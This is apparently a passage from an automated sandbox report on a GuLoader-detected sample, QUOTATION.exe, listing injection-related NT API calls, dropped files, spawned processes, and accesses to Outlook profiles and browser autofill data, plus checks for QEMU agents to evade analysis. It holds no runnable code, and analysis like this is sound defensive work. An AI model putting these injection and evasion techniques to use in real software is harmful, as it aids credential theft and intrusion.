          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E124C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371D2EC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3377717A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CD130
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3371F113
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337F010E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374B1E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337351C0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DE076
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E70F1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373B0D0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337200A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3376508C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33732760
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373A760
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E6757
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33754670
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DD646
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CD62C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374C600
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EF6F6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372C6E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A36EC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EA6C0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730680
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FA526
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EF5C9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E75C6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730445
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3379D480
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EFB2E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730B10
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3376DB19
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A4BC0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EEA5B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337ECA13
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EFA89
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337759C0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372E9A0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EE9A6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33739870
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3374B870
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A5870
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EF872
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33716868
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337D0835
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3375E810
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33733800
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E78F3
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E18DA
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337328C0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337A98B2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33746882
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EFF63
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AFF40
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373CF00
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33736FE0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E1FC6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EEFBF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337D0E6D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33772E48
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33722EE8
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E9ED2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33731EB2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E0EAD
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33730D69
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EFD27
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3372AD00
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337CFDF4
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33739DD0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33742DB0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33733C60
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337E6C69
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EEC60
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337DEC4C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373AC20
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337AEC20
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33720C12
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337B7CE8
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337FACEB
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33748CDF
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337C9C98
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: String function: 33777BE4 appears 96 times
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: String function: 3379E692 appears 86 times
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: String function: 337AEF10 appears 104 times
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: String function: 33765050 appears 35 times
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: String function: 3371B910 appears 268 times
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337634E0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762B10 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762BC0 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762B90 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337629F0 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762F00 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762E50 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762ED0 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762EB0 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762D10 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762DA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762C50 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762C30 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762CF0 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33764260 NtSetContextThread,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33764570 NtSuspendThread,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762B20 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762B00 NtQueryValueKey,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762BE0 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762B80 NtCreateKey,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762A10 NtWriteFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762AC0 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762AA0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762A80 NtClose,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337629D0 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337638D0 NtGetContextThread,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762F30 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762FB0 NtSetValueKey,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762E00 NtQueueApcThread,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762EC0 NtQuerySection,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762E80 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762D50 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33763C30 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762C20 NtSetInformationFile,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762C10 NtOpenProcess,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33762CD0 NtEnumerateKey,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33763C90 NtOpenThread,
          Source: System.dll.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: System.Security.Cryptography.X509Certificates.dll.2.drStatic PE information: No import functions for PE file found
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemaintenanceservice.exe0 vs QUOTATION.exe
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolutionExplorerCLI.dll vs QUOTATION.exe
          Source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dll@ vs QUOTATION.exe
          Source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs QUOTATION.exe
          Source: QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepkcs11-helper-1.dll" vs QUOTATION.exe
          Source: QUOTATION.exe, 00000002.00000002.3671365540.0000000000436000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs QUOTATION.exe
          Source: QUOTATION.exe, 00000008.00000003.4192719473.0000000033671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000008.00000002.4314495070.00000000034D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000008.00000002.4328211307.000000003381D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000008.00000002.4282050831.00000000000E4000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000008.00000003.4186562226.00000000334B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000008.00000002.4328211307.00000000339C0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
          Source: QUOTATION.exe, 00000008.00000000.3525394295.0000000000436000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs QUOTATION.exe
          Source: QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs QUOTATION.exe
          Source: QUOTATION.exeBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs QUOTATION.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\help.exeSection loaded: edgegdi.dll
          Source: QUOTATION.exeStatic PE information: invalid certificate
          Source: percentile.dll.2.drStatic PE information: Number of sections : 19 > 10
          Source: libdatrie-1.dll.2.drStatic PE information: Number of sections : 11 > 10
          Source: libpkcs11-helper-1.dll.2.drStatic PE information: Number of sections : 12 > 10
          Source: QUOTATION.exeVirustotal: Detection: 28%
          Source: QUOTATION.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\QUOTATION.exeFile read: C:\Users\user\Desktop\QUOTATION.exeJump to behavior
          Source: QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\GhettoJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\nsf6999.tmpJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@7/11@19/15
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_00402138 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\QUOTATION.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: 4995H5Jfc.10.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: QUOTATION.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, System.dll.2.dr
          Source: Binary string: maintenanceservice.pdb@ 0%P% source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr
          Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr
          Source: Binary string: mshtml.pdb source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, System.dll.2.dr
          Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr
          Source: Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000008.00000002.4328211307.00000000336F0000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4186562226.0000000033393000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4328211307.000000003381D000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4192719473.0000000033544000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4285759564.0000000003861000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003B3D000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003A10000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4280954827.00000000036B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr
          Source: Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000008.00000002.4328211307.00000000336F0000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4186562226.0000000033393000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4328211307.000000003381D000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4192719473.0000000033544000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4285759564.0000000003861000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003B3D000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003A10000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4280954827.00000000036B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdbUGP source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: Binary string: help.pdbGCTL source: QUOTATION.exe, 00000008.00000002.4282050831.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: maintenanceservice.pdb source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr
          Source: Binary string: help.pdb source: QUOTATION.exe, 00000008.00000002.4282050831.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: firefox.pdb source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000002.00000002.3674014091.0000000004F87000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000003.3060874680.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4282173420.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3674014091.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Industrialization\Snoldets\Embrocates\Utaalmodiges.Taa169, type: DROPPED
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_6F602F60 push eax; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_04E808C9 pushfd ; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_04E866CD push cs; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_04E86E92 push cs; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_04E84868 push D6704826h; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_04E83A61 push ecx; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_04E83A75 push ecx; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_04E87819 pushad ; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_04E86378 push cs; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337208CD push ecx; mov dword ptr [esp], ecx
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_01664868 push D6704826h; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_01667819 pushad ; ret
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_016608C9 pushfd ; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_01666378 push cs; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_01663A61 push ecx; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_01663A75 push ecx; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_016666CD push cs; retf
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_01666E92 push cs; retf
          Source: libdatrie-1.dll.2.drStatic PE information: section name: .xdata
          Source: libpkcs11-helper-1.dll.2.drStatic PE information: section name: .xdata
          Source: maintenanceservice2.exe.2.drStatic PE information: section name: .00cfg
          Source: percentile.dll.2.drStatic PE information: section name: .xdata
          Source: percentile.dll.2.drStatic PE information: section name: /4
          Source: percentile.dll.2.drStatic PE information: section name: /19
          Source: percentile.dll.2.drStatic PE information: section name: /31
          Source: percentile.dll.2.drStatic PE information: section name: /45
          Source: percentile.dll.2.drStatic PE information: section name: /57
          Source: percentile.dll.2.drStatic PE information: section name: /70
          Source: percentile.dll.2.drStatic PE information: section name: /81
          Source: percentile.dll.2.drStatic PE information: section name: /92
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_6F601A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: System.Security.Cryptography.X509Certificates.dll.2.drStatic PE information: 0xF15766E0 [Tue Apr 22 20:30:24 2098 UTC]
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\nsg9F21.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Alswith\Peroxidisement\Foresprges87\SolutionExplorerCLI.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.Security.Cryptography.X509Certificates.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\maintenanceservice2.exeJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\percentile.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\libpkcs11-helper-1.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\libdatrie-1.dllJump to dropped file
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect Any.run
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\explorer.exe TID: 3992Thread sleep time: -50000s >= -30000s
